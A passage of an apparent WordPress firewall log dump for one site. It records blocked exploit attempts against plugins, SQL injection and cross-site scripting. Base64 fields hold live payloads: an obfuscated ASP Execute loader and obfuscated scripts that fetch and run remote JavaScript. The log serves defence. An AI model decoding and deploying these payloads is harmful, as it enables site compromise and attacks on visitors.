Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JtYjIwMTRd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9pbWFnZXMvY2FjaGUuYXNw\",\"category\":\"sqli\",\"ssl\":0}'),(37876,1570435793.708681,1570435792.634800,'\0\0\0\0\0\0\0\0\0\0ÿÿ/',0,200,0,0,0,'https://bintara.com.my/blog/2018/12/11/logitech-rally/','https://bintara.com.my/blog/2018/12/11/logitech-rally/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Kinza/4.8.2','logged:waf','Watched IP Traffic: 5.8.47.2','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L2Jsb2cvMjAxOC8xMi8xMS9sb2dpdGVjaC1yYWxseS8=\",\"category\":\"logged\",\"ssl\":1}'),(37871,1569950043.501287,1569950042.380700,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37870,1569950046.093106,1569950044.645800,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=hc_ajax_save_option',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Hybrid Composer <= 1.4.5 - Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"154\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37869,1569949927.545040,1569949926.345200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Total Donations (all known versions) - Multiple Unauthenticated AJAX Actions','{\"learningMode\":0,\"failedRules\":\"129\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37868,1569949931.354549,1569949928.514100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Total Donations (all known versions) - Multiple Unauthenticated AJAX Actions','{\"learningMode\":0,\"failedRules\":\"129\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37867,1569949933.748721,1569949932.265200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W290d19wY3RsX2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC90ZXh0YXJlYT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhKF9hYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37866,1569949936.003203,1569949934.791800,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W290d19wY3RsX2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC90ZXh0YXJlYT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhKF9hYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"Lw==\",\"category\":\"xss\",\"ssl\":0}'),(37661,1569411659.750827,1569411658.966400,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=hc_ajax_save_option',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Hybrid Composer <= 1.4.5 - Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"154\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37662,1569411658.029330,1569411657.199500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37663,1569411656.253836,1569411655.405900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37664,1569411665.330286,1569411664.422900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=hc_ajax_save_option',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Hybrid Composer <= 1.4.5 - Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"154\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37647,1569411641.345857,1569411640.511100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37623,1569411069.618187,1569411068.786500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3RoaW1fdmFsdWVd\",\"paramValue\":\"WDwvc2NyaXB0PjxzY3JpcHQgICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2FhYWFhYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWEqLywxMTUvKiovLDQ2LypfYWFhYWFhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWEqLywxMTkvKiovLDk3LypfYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhKi8sMTA0LypfYWFhYWFhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhYWFhYWEqLyw0Ny8qKi8sMTA4LypfYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTA4LyoqLyw0Ny8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhKi8sMTA2LypfYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYWFhYWFhID0gX2FhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYWFhYWFhLmxlbmd0aCA+IDMpe19hYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhYWFhYWEub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9hYWFhYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhYWFhYWEucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhYWFhYSgwLDApO308L3NjcmlwdD48c2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37796,1569949632.254562,1569949629.060700,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37669,1569411711.990917,1569411711.127000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37826,1569949905.197450,1569949904.063100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37622,1569410940.123964,1569410935.864400,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?page=yuzo-related-post',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Related Posts <= 5.12.90 - Missing 